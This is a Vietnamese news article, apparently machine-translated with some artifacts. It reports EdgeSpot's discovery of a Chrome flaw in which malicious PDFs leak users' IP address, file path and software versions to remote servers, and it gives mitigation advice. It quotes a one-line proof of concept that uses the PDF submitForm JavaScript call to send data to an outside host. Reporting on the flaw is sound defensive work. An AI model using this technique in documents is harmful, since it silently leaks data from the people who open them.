Khai thác dịch vụ phát hiện EdgeSpot đã phát hiện ra lỗ hổng zero-day hấp dẫn của Chrome khi khai thác tài liệu PDF. Lỗ hổng cho phép kẻ tấn công thu thập dữ liệu nhạy cảm bằng các tài liệu PDF độc hại được mở trong Chrome.

Ngay khi nạn nhân mở các tệp PDF tương ứng trong Google Chrome, một chương trình độc hại bắt đầu hoạt động ở chế độ nền bằng cách thu thập dữ liệu người dùng.

Dữ liệu sau đó được chuyển tiếp đến máy chủ từ xa đang bị tin tặc kiểm soát. Bạn có thể tự hỏi những dữ liệu nào đang bị kẻ tấn công hút, họ nhắm mục tiêu dữ liệu sau trên PC của bạn:

• địa chỉ IP
• Đường dẫn đầy đủ của tệp PDF trên hệ thống
• Phiên bản hệ điều hành và Chrome

Cảnh giác với các tệp PDF có phần mềm độc hại

Bạn có thể ngạc nhiên khi biết rằng không có gì xảy ra khi Adobe Reader được sử dụng để mở tệp PDF. Ngoài ra, các yêu cầu POST HTTP được sử dụng để truyền dữ liệu đến các máy chủ từ xa mà không cần bất kỳ sự can thiệp nào của người dùng.

Các chuyên gia phát hiện ra rằng một trong hai miền readnotifycom hoặc burpcollaboratornet đang nhận dữ liệu.

Bạn có thể tưởng tượng cường độ của cuộc tấn công bằng cách xem xét thực tế là hầu hết các phần mềm chống vi-rút không thể phát hiện các mẫu được phát hiện bởi EdgeSpot.

Các chuyên gia tiết lộ rằng những kẻ tấn công đang sử dụng API Javascript this.submitForm () của PDF PDF để thu thập thông tin nhạy cảm của người dùng.

Chúng tôi đã thử nghiệm nó với PoC tối thiểu, một lệnh gọi API đơn giản như là this this.submitForm ('http://google.com/test'), sẽ khiến Google Chrome gửi dữ liệu cá nhân tới google.com.

Các chuyên gia thực sự phát hiện ra rằng lỗi Chrome này đang bị khai thác bởi hai bộ tệp PDF độc hại khác nhau. Cả hai đều được lưu hành vào tháng 10 năm 2017 và tháng 9 năm 2018, tương ứng.

Đáng chú ý, dữ liệu thu thập có thể được sử dụng bởi những kẻ tấn công để tinh chỉnh các cuộc tấn công trong tương lai. Các báo cáo cho thấy lô tệp đầu tiên được biên dịch bằng dịch vụ theo dõi PDF của ReadNotify.

Người dùng có thể sử dụng dịch vụ để theo dõi lượt xem của người dùng. EdgeSpot đã không chia sẻ bất kỳ chi tiết nào liên quan đến bản chất của bộ tệp PDF thứ hai.

Làm thế nào để được bảo vệ

Dịch vụ phát hiện khai thác EdgeSpot muốn cảnh báo cho người dùng Chrome về những rủi ro tiềm ẩn vì bản vá dự kiến ​​sẽ không được phát hành trong tương lai gần.

EdgeSpot đã báo cáo với Google về lỗ hổng năm ngoái và công ty hứa sẽ phát hành một bản vá vào cuối tháng Tư. H

tuy nhiên, bạn có thể xem xét sử dụng cách khắc phục tạm thời cho sự cố bằng cách xem cục bộ các tài liệu PDF đã nhận bằng ứng dụng đọc PDF thay thế.

Ngoài ra, bạn cũng có thể mở các tài liệu PDF của mình trong Chrome bằng cách ngắt kết nối các hệ thống của bạn khỏi Internet. Trong khi đó, bạn có thể chờ đợi bản cập nhật Chrome 74 dự kiến ​​sẽ được tung ra vào ngày 23 tháng 4.